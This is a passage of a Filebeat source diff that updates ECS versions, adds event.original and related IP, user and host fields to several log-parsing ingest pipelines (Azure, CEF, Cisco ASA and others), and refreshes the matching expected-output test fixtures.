"{\"time\":\"2015-01-21T22:14:26.9792776Z\",\"resourceId\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"operationName\":\"microsoft.support/supporttickets/write\",\"category\":\"Write\",\"resultType\":\"Success\",\"resultSignature\":\"Succeeded.Created\",\"durationMs\":2826,\"callerIpAddress\":\"111.111.111.11\",\"correlationId\":\"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8\",\"identity\":{\"authorization\":{\"scope\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"action\":\"microsoft.support/supporttickets/write\",\"evidence\":{\"role\":\"Subscription Admin\"}},\"claims\":{\"aud\":\"https://management.core.windows.net/\",\"iss\":\"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/\",\"iat\":\"1421876371\",\"nbf\":\"1421876371\",\"exp\":\"1421880271\",\"ver\":\"1.0\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"1e8d8218-c5e7-4578-9acc-9abbd5d23315 \",\"http://schemas.microsoft.com/claims/authnmethodsreferences\":\"pwd\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"2468adf0-8211-44e3-95xq-85137af64708\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn\":\"admin@contoso.com\",\"puid\":\"20030000801A118C\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname\":\"John\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname\":\"Smith\",\"name\":\"John Smith\",\"groups\":\"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\":\" admin@contoso.com\",\"appid\":\"c44b4083-3bq0-49c1-b47d-974e53cbdf3c\",\"appidacr\":\"2\",\"http://schemas.microsoft.com/identity/claims/scope\":\"user_impersonation\",\"http://schemas.microsoft.com/claims/authnclassreference\":\"1\"}},\"level\":\"Information\",\"location\":\"global\",\"properties\":{\"statusCode\":\"Created\",\"serviceRequestId\":\"50d5cddb-8ca0-47ad-9b80-6cde2207f97c\"}}", "event.outcome": "success", "event.type": [ "change" @@ -58,6 +60,12 @@ "input.type": "log", "log.level": "Information", "log.offset": 0, + "related.ip": [ + "111.111.111.11" + ], + "related.user": [ + "admin" + ], "service.type": "azure", "source.as.number": 2516, "source.as.organization.name": "KDDI CORPORATION", @@ -71,6 +79,7 @@ "forwarded" ], "user.domain": "contoso.com", + "user.email": " admin@contoso.com", "user.full_name": "John Smith", "user.name": "admin" } diff --git a/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml index f7894a5c3bf4..7f5eb0915503 100644 --- a/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/auditlogs/config/file.yml b/x-pack/filebeat/module/azure/auditlogs/config/file.yml index d24e13efdcb8..ded48a1474fe 100644 --- a/x-pack/filebeat/module/azure/auditlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/auditlogs/config/file.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/auditlogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/auditlogs/ingest/pipeline.yml index e6a29f6cc13d..052fd9d69ae2 100644 --- a/x-pack/filebeat/module/azure/auditlogs/ingest/pipeline.yml +++ b/x-pack/filebeat/module/azure/auditlogs/ingest/pipeline.yml @@ -39,10 +39,11 @@ processors: field: azure.auditlogs.level target_field: log.level ignore_missing: true +- rename: + field: message + target_field: event.original - remove: - field: - - message - - azure.auditlogs.time + field: azure.auditlogs.time ignore_missing: true - convert: field: azure.auditlogs.operationName diff --git a/x-pack/filebeat/module/azure/auditlogs/test/auditlogs.log-expected.json b/x-pack/filebeat/module/azure/auditlogs/test/auditlogs.log-expected.json index 7d18285024a9..3e4e3c643133 100644 --- a/x-pack/filebeat/module/azure/auditlogs/test/auditlogs.log-expected.json +++ b/x-pack/filebeat/module/azure/auditlogs/test/auditlogs.log-expected.json @@ -34,6 +34,7 @@ "event.duration": 0, "event.kind": "event", "event.module": "azure", + "event.original": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":null,\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":null}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":null}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "event.outcome": "success", "fileset.name": "auditlogs", "input.type": "log", diff --git a/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml index 496480aa1d0c..80a73bc99058 100644 --- a/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/platformlogs/config/file.yml b/x-pack/filebeat/module/azure/platformlogs/config/file.yml index e9470671e071..4242dc4cd7b2 100644 --- a/x-pack/filebeat/module/azure/platformlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/platformlogs/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/platformlogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/platformlogs/ingest/pipeline.yml index 8493ef886fe2..6d68736bc8b9 100644 --- a/x-pack/filebeat/module/azure/platformlogs/ingest/pipeline.yml +++ b/x-pack/filebeat/module/azure/platformlogs/ingest/pipeline.yml @@ -28,10 +28,11 @@ processors: formats: - ISO8601 - "M/d/yyyy h:mm:ss a XXX" +- rename: + field: message + target_field: event.original - remove: - field: - - message - - azure.platformlogs.time + field: azure.platformlogs.time ignore_missing: true - rename: field: azure.platformlogs.resourceId @@ -62,6 +63,15 @@ processors: field: azure.platformlogs.callerIpAddress target_field: source.ip ignore_missing: true +- set: + field: client.ip + value: '{{source.ip}}' + ignore_empty_value: true +- append: + field: related.ip + value: '{{source.ip}}' + allow_duplicates: false + if: 'ctx.source?.ip != null' - rename: field: azure.platformlogs.level target_field: log.level diff --git a/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-eventhub.log-expected.json b/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-eventhub.log-expected.json index b8a96002e140..4401b205a966 100644 --- a/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-eventhub.log-expected.json +++ b/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-eventhub.log-expected.json @@ -24,6 +24,7 @@ "event.dataset": "azure.platformlogs", "event.kind": "event", "event.module": "azure", + "event.original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\",\\\"Via\\\":\\\"sb://obstesteventhubs.servicebus.windows.net/insights-logs-operationallogs/consumergroups?api-version=2017-04\\u0026$skip=0\\u0026$top=100\\\",\\\"TrackingId\\\":\\\"30ed877c-a36b-491a-bd4d-ddd847fe55b8_M2CH3_M2CH3_G3S2\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "event.outcome": "succeeded", "fileset.name": "platformlogs", "input.type": "log", diff --git a/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-kube.log-expected.json b/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-kube.log-expected.json index 59669df1681e..1e5b7cc84e35 100644 --- a/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-kube.log-expected.json +++ b/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-kube.log-expected.json @@ -19,6 +19,7 @@ "event.dataset": "azure.platformlogs", "event.kind": "event", "event.module": "azure", + "event.original": "{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\",\\\"apiVersion\\\":\\\"audit.k8s.io/v1\\\",\\\"level\\\":\\\"Metadata\\\",\\\"auditID\\\":\\\"22af12c3-a1fe-4f2c-99a9-3cdde671dbfe\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\",\"stream\":\"stdout\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "fileset.name": "platformlogs", "input.type": "log", "log.offset": 0, diff --git a/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml index b779113753bb..e37c7c61a4d3 100644 --- a/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/signinlogs/config/file.yml b/x-pack/filebeat/module/azure/signinlogs/config/file.yml index d24e13efdcb8..ded48a1474fe 100644 --- a/x-pack/filebeat/module/azure/signinlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/signinlogs/config/file.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml index b156d5346d3a..e20115d6b05f 100644 --- a/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml +++ b/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml @@ -18,10 +18,11 @@ processors: ignore_failure: false formats: - ISO8601 +- rename: + field: message + target_field: event.original - remove: - field: - - message - - azure.signinlogs.time + field: azure.signinlogs.time ignore_missing: true - rename: field: azure.signinlogs.resourceId @@ -31,6 +32,15 @@ processors: field: azure.signinlogs.callerIpAddress target_field: source.ip ignore_missing: true +- set: + field: client.ip + value: '{{source.ip}}' + ignore_empty_value: true +- append: + field: related.ip + value: '{{source.ip}}' + allow_duplicates: false + if: 'ctx.source?.ip != null' - rename: field: azure.signinlogs.Level target_field: log.level diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json index db0643ccf25b..75e6eb05bb25 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json +++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json @@ -37,6 +37,7 @@ "azure.signinlogs.result_signature": "None", "azure.signinlogs.result_type": "50140", "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", + "client.ip": "81.171.241.231", "cloud.provider": "azure", "event.action": "Sign-in activity", "event.category": [ @@ -46,6 +47,7 @@ "event.duration": 0, "event.kind": "event", "event.module": "azure", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"81.171.241.231\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.171.241.231\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "event.outcome": "failure", "event.type": [ "info" @@ -60,6 +62,9 @@ "log.level": 4, "log.offset": 0, "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.", + "related.ip": [ + "81.171.241.231" + ], "service.type": "azure", "source.as.number": 8426, "source.as.organization.name": "Claranet Ltd", @@ -118,6 +123,7 @@ "azure.signinlogs.result_signature": "None", "azure.signinlogs.result_type": "50140", "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", + "client.ip": "8.8.8.8", "cloud.provider": "azure", "event.action": "Sign-in activity", "event.category": [ @@ -127,6 +133,7 @@ "event.duration": 0, "event.kind": "event", "event.module": "azure", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.171.241.231\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "event.outcome": "failure", "event.type": [ "info" @@ -141,6 +148,9 @@ "log.level": 4, "log.offset": 1688, "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.", + "related.ip": [ + "8.8.8.8" + ], "service.type": "azure", "source.as.number": 15169, "source.as.organization.name": "Google LLC", diff --git a/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml b/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml index 1a1ed1bc28c8..f4f33a69fe86 100644 --- a/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml +++ b/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/barracuda/waf/config/input.yml b/x-pack/filebeat/module/barracuda/waf/config/input.yml index 30ae8228f704..26be6dda1154 100644 --- a/x-pack/filebeat/module/barracuda/waf/config/input.yml +++ b/x-pack/filebeat/module/barracuda/waf/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/bluecoat/director/config/input.yml b/x-pack/filebeat/module/bluecoat/director/config/input.yml index 7b8167b42388..a907db353bbf 100644 --- a/x-pack/filebeat/module/bluecoat/director/config/input.yml +++ b/x-pack/filebeat/module/bluecoat/director/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/cef/log/config/input.yml b/x-pack/filebeat/module/cef/log/config/input.yml index 4568f659c3a8..7916908599e3 100644 --- a/x-pack/filebeat/module/cef/log/config/input.yml +++ b/x-pack/filebeat/module/cef/log/config/input.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cef/log/ingest/pipeline.yml b/x-pack/filebeat/module/cef/log/ingest/pipeline.yml index 676f66a943ae..18a2cda4bf2c 100644 --- a/x-pack/filebeat/module/cef/log/ingest/pipeline.yml +++ b/x-pack/filebeat/module/cef/log/ingest/pipeline.yml @@ -52,35 +52,48 @@ processors: - append: field: related.hash value: "{{cef.extensions.fileHash}}" - if: "ctx?.cef?.extensions?.fileHash != null" + allow_duplicates: false + if: "ctx?.cef?.extensions?.fileHash != null && ctx?.cef?.extensions?.fileHash != ''" - append: field: related.hash value: "{{cef.extensions.oldFileHash}}" - if: "ctx?.cef?.extensions?.oldFileHash != null" + allow_duplicates: false + if: "ctx?.cef?.extensions?.oldFileHash != null && ctx?.cef?.extensions?.oldFileHash != ''" - append: field: related.ip value: "{{destination.ip}}" - if: "ctx?.destination?.ip != null" + allow_duplicates: false + if: "ctx?.destination?.ip != null && ctx?.destination?.ip != ''" - append: field: related.ip value: "{{destination.nat.ip}}" - if: "ctx?.destination?.nat?.ip != null" + allow_duplicates: false + if: "ctx?.destination?.nat?.ip != null && ctx?.destination?.nat?.ip != ''" - append: field: related.ip value: "{{source.ip}}" - if: "ctx?.source?.ip != null" + allow_duplicates: false + if: "ctx?.source?.ip != null && ctx?.source?.ip != ''" - append: field: related.ip value: "{{source.nat.ip}}" - if: "ctx?.source?.nat?.ip != null" + allow_duplicates: false + if: "ctx?.source?.nat?.ip != null && ctx?.source?.nat?.ip != ''" - append: field: related.user value: "{{destination.user.name}}" - if: "ctx?.destination?.user?.name != null" + allow_duplicates: false + if: "ctx?.destination?.user?.name != null && ctx?.destination?.user?.name != ''" - append: field: related.user value: "{{source.user.name}}" - if: "ctx?.source?.user?.name != null" + allow_duplicates: false + if: "ctx?.source?.user?.name != null && ctx?.source?.user?.name != ''" + - append: + field: related.hosts + value: "{{observer.hostname}}" + allow_duplicates: false + if: "ctx?.observer?.hostname != null && ctx?.observer?.hostname != ''" - pipeline: name: '{< IngestPipeline "fp-pipeline" >}' if: "ctx.cef?.device?.vendor == 'FORCEPOINT'" diff --git a/x-pack/filebeat/module/cef/log/test/fp-ngfw-smc.log-expected.json b/x-pack/filebeat/module/cef/log/test/fp-ngfw-smc.log-expected.json index 70ef4f7776ff..3087409c9700 100644 --- a/x-pack/filebeat/module/cef/log/test/fp-ngfw-smc.log-expected.json +++ b/x-pack/filebeat/module/cef/log/test/fp-ngfw-smc.log-expected.json @@ -27,6 +27,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "6.6.1", + "related.hosts": [ + "10.1.1.40" + ], "service.type": "cef", "tags": [ "cef", @@ -61,6 +64,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "6.6.1", + "related.hosts": [ + "10.1.1.40" + ], "service.type": "cef", "tags": [ "cef", @@ -108,6 +114,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "6.6.1", + "related.hosts": [ + "10.1.1.40" + ], "related.ip": [ "10.1.1.40", "10.37.205.252" @@ -161,6 +170,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.10" + ], "related.ip": [ "255.255.255.255", "172.16.1.1" @@ -214,6 +226,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.1" + ], "related.ip": [ "192.168.1.1", "172.16.1.1" @@ -264,6 +279,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.6" + ], "related.user": [ "alice" ], @@ -304,6 +322,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.3" + ], "related.ip": [ "192.168.1.1" ], @@ -347,6 +368,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.10" + ], "related.ip": [ "192.168.1.1" ], @@ -390,6 +414,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.8" + ], "related.ip": [ "172.16.2.1" ], @@ -432,6 +459,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "6.6.1", + "related.hosts": [ + "10.1.1.40" + ], "service.type": "cef", "tags": [ "cef", diff --git a/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml b/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml index e0fa537fc889..1925a535c245 100644 --- a/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml +++ b/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_zones }} - add_fields: target: _temp_ diff --git a/x-pack/filebeat/module/cisco/asa/config/input.yml b/x-pack/filebeat/module/cisco/asa/config/input.yml index 2e85cd4dfee1..5dadd775a99d 100644 --- a/x-pack/filebeat/module/cisco/asa/config/input.yml +++ b/x-pack/filebeat/module/cisco/asa/config/input.yml @@ -23,7 +23,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json index 1d225c42addf..2578835b3d0a 100644 --- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json @@ -1743,6 +1743,9 @@ "related.hosts": [ "dev01" ], + "related.user": [ + "aaaa" + ], "service.type": "cisco", "tags": [ "cisco-asa", @@ -1779,6 +1782,9 @@ "related.hosts": [ "dev01" ], + "related.user": [ + "aaaa" + ], "service.type": "cisco", "tags": [ "cisco-asa", @@ -2115,7 +2121,6 @@ "dev01" ], "related.ip": [ - "10.10.10.10", "10.10.10.10" ], "service.type": "cisco", @@ -2207,7 +2212,6 @@ "dev01" ], "related.ip": [ - "10.10.10.10", "10.10.10.10" ], "service.type": "cisco", @@ -2302,7 +2306,6 @@ "dev01" ], "related.ip": [ - "10.20.30.40", "10.20.30.40" ], "service.type": "cisco", @@ -2347,7 +2350,6 @@ "dev01" ], "related.ip": [ - "10.20.30.40", "10.20.30.40" ], "service.type": "cisco", @@ -2392,7 +2394,6 @@ "dev01" ], "related.ip": [ - "10.20.30.40", "10.20.30.40" ], "service.type": "cisco", @@ -2437,7 +2438,6 @@ "dev01" ], "related.ip": [ - "10.20.30.40", "10.20.30.40" ], "service.type": "cisco", @@ -2710,6 +2710,9 @@ "related.ip": [ "10.10.0.87" ], + "related.user": [ + "enable_15" + ], "service.type": "cisco", "source.address": "10.10.0.87", "source.ip": "10.10.0.87", @@ -2749,6 +2752,9 @@ "related.hosts": [ "dev01" ], + "related.user": [ + "enable_15" + ], "service.type": "cisco", "tags": [ "cisco-asa", @@ -2794,6 +2800,9 @@ "10.10.1.212", "10.10.1.254" ], + "related.user": [ + "*****" + ], "service.type": "cisco", "source.address": "10.10.1.212", "source.ip": "10.10.1.212", @@ -2837,6 +2846,9 @@ "related.ip": [ "10.10.0.87" ], + "related.user": [ + "admin" + ], "service.type": "cisco", "source.address": "10.10.0.87", "source.ip": "10.10.0.87", @@ -2884,6 +2896,9 @@ "10.10.0.87", "10.10.1.254" ], + "related.user": [ + "admin" + ], "service.type": "cisco", "source.address": "10.10.0.87", "source.ip": "10.10.0.87", @@ -2927,6 +2942,9 @@ "related.ip": [ "10.10.0.87" ], + "related.user": [ + "admin" + ], "service.type": "cisco", "source.address": "10.10.0.87", "source.ip": "10.10.0.87", @@ -3031,6 +3049,9 @@ "related.ip": [ "91.240.17.178" ], + "related.user": [ + "91.240.17.178" + ], "service.type": "cisco", "source.bytes": 297103, "source.user.name": "91.240.17.178", @@ -3071,6 +3092,9 @@ "related.ip": [ "8.8.8.8" ], + "related.user": [ + "testuser" + ], "service.type": "cisco", "source.address": "8.8.8.8", "source.as.number": 15169, @@ -3119,6 +3143,9 @@ "related.ip": [ "8.8.8.8" ], + "related.user": [ + "testuser" + ], "service.type": "cisco", "source.address": "8.8.8.8", "source.as.number": 15169, @@ -3167,6 +3194,9 @@ "related.ip": [ "192.168.50.1" ], + "related.user": [ + "alice" + ], "service.type": "cisco", "source.address": "192.168.50.1", "source.ip": "192.168.50.1", diff --git a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json index a57299252caf..bcd775e4e1e6 100644 --- a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json @@ -96,7 +96,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -143,7 +142,6 @@ "observer.type": "firewall", "observer.vendor": "Cisco", "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -197,7 +195,6 